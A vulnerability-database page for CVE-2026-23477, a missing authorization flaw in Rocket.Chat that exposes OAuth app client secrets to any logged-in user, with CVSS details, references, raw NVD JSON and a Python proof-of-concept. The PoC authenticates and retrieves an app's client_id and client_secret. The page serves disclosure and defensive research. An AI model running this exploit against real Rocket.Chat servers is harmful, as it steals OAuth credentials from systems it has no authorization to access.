CVE-2026-23477

Description

Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions up to 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. This endpoint returns an OAuth application, as long as the user knows its ID, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE

Rocket.Chat < 6.12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2026-23477 PoC - Rocket.Chat OAuth Apps Information Disclosure # Target: Rocket.Chat < 6.12.0 # Endpoint: GET /api/v1/oauth-apps.get TARGET_URL = "http://target-rocketchat.com" USERNAME = "[email protected]" PASSWORD = "password123" TARGET_OAUTH_APP_ID = "TARGET_OAUTH_APP_ID" def exploit(): # Step 1: Authenticate with the target Rocket.Chat instance session = requests.Session() login_url = f"{TARGET_URL}/api/v1/login" login_data = { "user": USERNAME, "password": PASSWORD } print("[*] Authenticating to Rocket.Chat...") response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Authentication failed") return auth_data = response.json() if not auth_data.get('status') == 'success': print("[-] Authentication failed") return user_id = auth_data['data']['userId'] auth_token = auth_data['data']['authToken'] print(f"[+] Authenticated successfully. UserID: {user_id}") # Step 2: Request OAuth app information without proper authorization headers = { "X-Auth-Token": auth_token, "X-User-Id": user_id } oauth_url = f"{TARGET_URL}/api/v1/oauth-apps.get?id={TARGET_OAUTH_APP_ID}" print(f"[*] Requesting OAuth app information: {oauth_url}") response = session.get(oauth_url, headers=headers) if response.status_code == 200: oauth_data = response.json() if oauth_data.get('success'): app_info = oauth_data.get('oauthApp', {}) print("[+] OAuth App Information Retrieved:") print(f" Client ID: {app_info.get('clientId')}") print(f" Client Secret: {app_info.get('clientSecret')}") print(f" App Name: {app_info.get('name')}") print(f" Active: {app_info.get('active')}") return app_info else: print(f"[-] Request failed with status code: {response.status_code}") return None if __name__ == "__main__": exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23477
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23477
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23477/
[4] VulDB https://vuldb.com/cve/CVE-2026-23477
[5] https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23477", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:47.990", "lastModified": "2026-01-26T18:03:24.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions up to 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. This endpoint returns an OAuth application, as long as the user knows its ID, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0."}, {"lang": "es", "value": "Rocket.Chat es una plataforma de comunicaciones de código abierto, segura y totalmente personalizable. En las versiones de Rocket.Chat hasta la 6.12.0, el endpoint de la API GET /api/v1/oauth-apps.get está expuesto a cualquier usuario autenticado, independientemente de su rol o permisos. Este endpoint devuelve una aplicación OAuth, siempre que el usuario conozca su ID, incluyendo campos potencialmente sensibles como client_id y client_secret. Esta vulnerabilidad está corregida en la 6.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.12.0", "matchCriteriaId": "BDDC551C-B721-4452-91D8-D53E1316D806"}]}]}], "references": [{"url": "https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}